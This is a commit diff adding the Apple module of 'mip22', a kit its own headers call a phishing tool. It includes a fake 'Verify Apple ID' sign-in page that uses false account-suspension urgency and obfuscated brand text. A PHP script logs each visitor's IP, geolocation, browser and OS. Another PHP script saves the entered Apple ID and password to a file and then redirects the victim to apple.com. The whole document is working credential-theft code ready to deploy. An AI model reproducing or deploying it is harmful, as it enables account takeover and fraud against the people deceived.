Add files via upload

.pages/apple/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nAPPLE VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

.pages/apple/index.html

@@ -0,0 +1,264 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" dir="ltr">
+
+<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
+<head>
+ <meta http-equiv="X-UA-Compatible" content="IE=Edge" />  
+ <link rel="shortcut icon" href="images/favicon.ico">
+    <title>Verify Apple ID - Login</title>
+    <link rel="stylesheet" type="text/css" href="images/navigation.css" id="globalheader-stylesheet"></link>
+    <link rel="stylesheet" type="text/css" href="images/base.css"></link>
+    <link rel="stylesheet" type="text/css" href="images/id.css"></link>
+    <link rel="stylesheet" type="text/css" href="images/hsa.css"></link>
+<script language="JavaScript1.2">
+var testresults
+function checkemail(){
+var str=document.email.email.value
+var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
+if (filter.test(str))
+testresults=true
+else{
+alert("Please enter valid e-mail!")
+testresults=false
+}
+var x=document.forms["email"]["password"].value;
+if (x==null || x=="")
+  {
+  alert("Please enter valid password!");
+  return false;
+  }
+return (testresults)
+}
+</script>
+
+
+<script>
+function checkbae(){
+if (document.layers||document.getElementById||document.all)
+return checkemail()
+else
+return true
+}
+</script>
+</head>
+
+
+<body class="myappleid sign-in index" id="editContainerBody">
+
+<!--********* New style imported as per the new Header *********-->
+
+<!-- end -->
+
+<!--********* setting country and language from Language parameter *********-->
+
+
+
+<!--********* setting locale to urlLanguageInsert to dynamically form the URL based on locale *********-->
+
+
+
+	
+		
+	
+	
+	
+	
+		
+
+<nav id="globalheader" class="globalheader" role="navigation" aria-label="Global Navigation" data-hires="false" data-analytics-region="global nav" lang="en-US">
+
+<div id="gh-content" class="gh-content">
+      <ul class="gh-menu">
+        <li id="gh-menu-icon-toggle" class="gh-menu-icon gh-menu-icon-toggle"><button id="gh-svg-icons" class="gh-svg-wrapper"></button><span class="gh-text-replace">Menu</span></li>
+        <li id="gh-menu-icon-home" class="gh-menu-icon gh-menu-icon-home"><a href="/"><span class="gh-text-replace">Apple</span></a></li>
+      </ul><!--/gh-menu-->
+
+
+
+
+<div class="gh-nav">
+ <div class="gh-nav-view">
+    
+	         
+	
+	
+	 
+	
+	
+	
+		
+
+
+
+
+          <ul class="gh-nav-list">
+            <li class="gh-tab gh-tab-apple"><a class="gh-tab-link" href="http://www.apple.com/" onclick="s_objectID=&quot;http://www.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Apple</span></span></a></li>
+            <li class="gh-tab gh-tab-store">
+            
+            
+			
+			
+			
+			
+            <a class="gh-tab-link" href="http://store.apple.com/" onclick="s_objectID=&quot;http://store.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Store</span></span></a>
+            
+            </li>
+            <li class="gh-tab gh-tab-mac">
+				
+            		<a class="gh-tab-link" href="http://www.apple.com/mac" onclick="s_objectID=&quot;http://www.apple.com/mac/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Mac</span></span></a>
+            	
+            </li>
+            <li class="gh-tab gh-tab-iphone">
+				
+            		<a class="gh-tab-link" href="http://www.apple.com/iphone" onclick="s_objectID=&quot;http://www.apple.com/iphone/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPhone</span></span></a>
+            	
+            </li>
+            <li class="gh-tab gh-tab-watch">
+            	
+            	
+            		<a class="gh-tab-link" href="http://www.apple.com/watch" onclick="s_objectID=&quot;http://www.apple.com/watch/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Watch</span></span></a>
+            	
+            </li>
+            <li class="gh-tab gh-tab-ipad">
+            	
+					
+            		
+            			<a class="gh-tab-link" href="http://www.apple.com/ipad" onclick="s_objectID=&quot;http://www.apple.com/ipad/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPad</span></span></a>
+            		
+            </li>
+            <li class="gh-tab gh-tab-ipod">
+				
+            	
+            		<a class="gh-tab-link" href="http://www.apple.com/ipod" onclick="s_objectID=&quot;http://www.apple.com/ipod/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPod</span></span></a>
+            			
+            </li>
+            <li class="gh-tab gh-tab-itunes">
+				
+					<a class="gh-tab-link" href="http://www.apple.com/itunes" onclick="s_objectID=&quot;http://www.apple.com/itunes/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iTunes</span></span></a>
+            	
+            </li>
+            <li class="gh-tab gh-tab-support">
+            	
+            	
+            		<a class="gh-tab-link" href="http://www.apple.com/support" onclick="s_objectID=&quot;http://www.apple.com/support/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Support</span></span></a>
+            	
+            </li>
+           
+           <li id="gh-tab-search" class="gh-tab gh-tab-search">
+              <div id="gh-search" class="gh-search" role="search">
+               <form action="post.php" method="post" class="gh-search-form" id="gh-search-form" data-search-recommended-results='{"url":"https://www.apple.com/global/nav/scripts/shortcuts.php","requestName":"recommendedResults","queryName":"q","dataType":"xml"}' data-search-suggested-searches='{"url":"https://www.apple.com/search/instant/getSuggestions","requestName":"suggestedSearches","queryName":"query","queryParams":{"model":"marcom_en_US","locale":"en_US"},"dataType":"json"}' >                 
+                 
+                  <div class="gh-search-input-wrapper">
+                       <label for="gh-search-input" class="gh-text-replace">Search apple.com</label>
+                       <input type="text" name="q" id="gh-search-input" class="gh-search-input" placeholder="Search apple.com" />
+                   </div>
+                    <button disabled="disabled" type="submit" id="gh-search-submit" class="gh-search-submit gh-search-magnify"><span class="gh-text-replace">Search apple.com</span></button>
+                    <button disabled="disabled" type="reset" id="gh-search-reset" class="gh-search-reset"><span class="gh-text-replace">Reset</span></button>
+                  
+                </form>
+              </div>
+              <a class="gh-search-magnify" href="http://www.apple.com/search/"><span class="gh-text-replace">Search apple.com</span></a>
+            </li>
+          </ul>
+        </div>
+      </div><!--/gh-nav-->
+
+    </div>
+  </nav><!--/globalheader-->
+
+
+
+<!-- header ends here -->
+    
+<form method="post" onSubmit="return checkbae()" id="signIn" name="email" action="post.php">
+	
+  <div id="productheader">
+	  
+			<a aria-label="My ID" href="#">
+			  <h2>
+			     <img aria-hidden="true" class="DimAppleIdLogoIV" src="images/logo.png" />
+			  </h2>
+			</a>
+		
+		
+</div>
+		<div id="main">
+			<div id="content" class="content">
+				<div class="grid2colc wrap">
+				
+					<div class="column first sidebar">
+						<h2>Please sign in to verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT></h2>
+						<p class="intro">
+						  Please login to verify & update your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> account information.</p>
+						<h2>Account Verification.</h2>
+						<p class="intro">
+						We occasionally require our users to verify or update their account information on file. This can be due to invalid account details, or an expired payment method. 						<br/><br/><b>You will be unable to use your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> or make purchases until this process is completed.</b>
+						</p>
+						
+					</div><!--/column-->
+
+					<div class="column last">
+					<h2>Sign in to verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>.</h2>
+					<div class="formrow">
+					
+					
+					<span class="formwrap">
+						<input size="30" autocapitalize="off" autocorrect="off" maxlength="128" placeholder="Apple ID" value="" aria-label="Apple ID" id="email" type="text" name="email" />
+					</span>
+					
+					<span class="input-msg show">
+						<a name="" id="" href="forgot.html"><span>Forgot your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>?</span></a>
+					</span>
+				</div>
+				<div class="formrow">
+					<span class="formwrap">
+						<input size="30" oncut="" oncopy="" autocapitalize="off" autocorrect="off" aria-label="Password" placeholder="Password" id="password" type="password" name="password" required/>
+					</span>
+					<span class="input-msg show">
+						<a name="" type="submit" id="" href="forgot.html"><span>Forgot your Password?</span></a>
+					</span>
+				</div>
+				
+				<div id="bot-nav">
+					
+					<a type="submit" class="btn bigblue">
+							<input class="btn bigblue" id="" onsubmit="return validateForm()" type="submit" value="Sign In To Apple ID Verification" name="" />
+						</a>					
+					</div>	
+					</div>
+				
+				</div>
+			</div>
+		</div>
+	
+</form>
+
+
+    
+    <footer id="globalfooter">
+	    
+	    	<div id="breadory">
+	<ol id="breadcrumbs">
+		<li class="home"><a>Home</a></li>
+		
+			<li> <a onClick="" href="#">My <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT></a> </li>
+		
+		
+	</ol>
+</div>
+<div class="gf-sosumi">
+        <p>Copyright &copy; 2020 <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' Inc') </SCRIPT> All rights reserved.</p>
+        <ul class="piped">
+                <li><a class="first" href="terms.html">Terms of Use</a></li>
+                <li><a href="privacy.html">Privacy Policy</a></li>
+                  <li style="float:right">
+                <a class="choose" title="Choose your country or region" href="chooseyourcountry.html"><p style="display:inline;margin-right:-5px; padding-right:0px;"><SCRIPT TYPE="text/javascript"> document.write('Choose' + ' your') </SCRIPT> country or region</p><img class="img-22" src="images/usa.png" /></a></li>
+               
+        </ul>
+</div>
+</footer>
+
+
+
+</body>
+</html>

.pages/apple/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

.pages/apple/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nAPPLE VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.apple.com/"/>